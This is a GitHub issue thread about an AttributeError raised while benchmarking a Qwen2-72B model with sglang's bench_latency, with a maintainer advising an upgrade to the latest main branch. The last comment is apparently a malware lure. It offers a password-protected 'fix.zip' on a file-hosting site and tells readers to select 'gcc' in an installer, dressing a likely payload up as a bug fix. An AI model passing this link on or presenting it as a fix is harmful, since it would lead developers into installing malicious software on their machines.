### ISSUE TITLE
[Bug] AttributeError: 'ScheduleBatch' object has no attribute 'sample'  WHEN I DO Benchmarking

### ISSUE THREAD

**Issue by ArtificialZeng** [sgl-project/sglang#1241]
### Checklist

- [ ] 1. I have searched related issues but cannot get the expected help.
- [ ] 2. The bug has not been fixed in the latest version.
- [ ] 3. Please note that if the bug-related issue you submitted lacks corresponding environment info and a minimal reproducible demo, it will be challenging for us to reproduce and resolve the issue, reducing the likelihood of receiving feedback.
- [ ] 4. If the issue you raised is not a bug but a question, please raise a discussion at https://github.com/sgl-project/sglang/discussions/new/choose Otherwise, it will be closed.
- [ ] 5. Please use English, otherwise it will be closed.

### Describe the bug

AttributeError: 'ScheduleBatch' object has no attribute 'sample'
/home/adminad/anaconda3/envs/swift_ds0145/lib/python3.12/multiprocessing/resource_tracker.py:224: UserWarning: resource_tracker: There appear to be 1 leaked shared_memory objects to clean up at shutdown
  warnings.warn('resource_tracker: There appear to be %d '

### Reproduction

SGLANG_USE_MODELSCOPE=true python -m sglang.bench_latency --model-path /data/hub/qwen/Qwen2-72B-Instruct --batch 32 --input-len 256 --output-len 32 --tp 8 --mem-fraction-static 0.8 --dtype bfloat16 --context-length 512 --disable-flashinfer --disable-flashinfer-sampling --enable-p2p-check

### Environment

python 3.12 latest sglang

**Comment by zhyncs** [comment]
use latest main

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
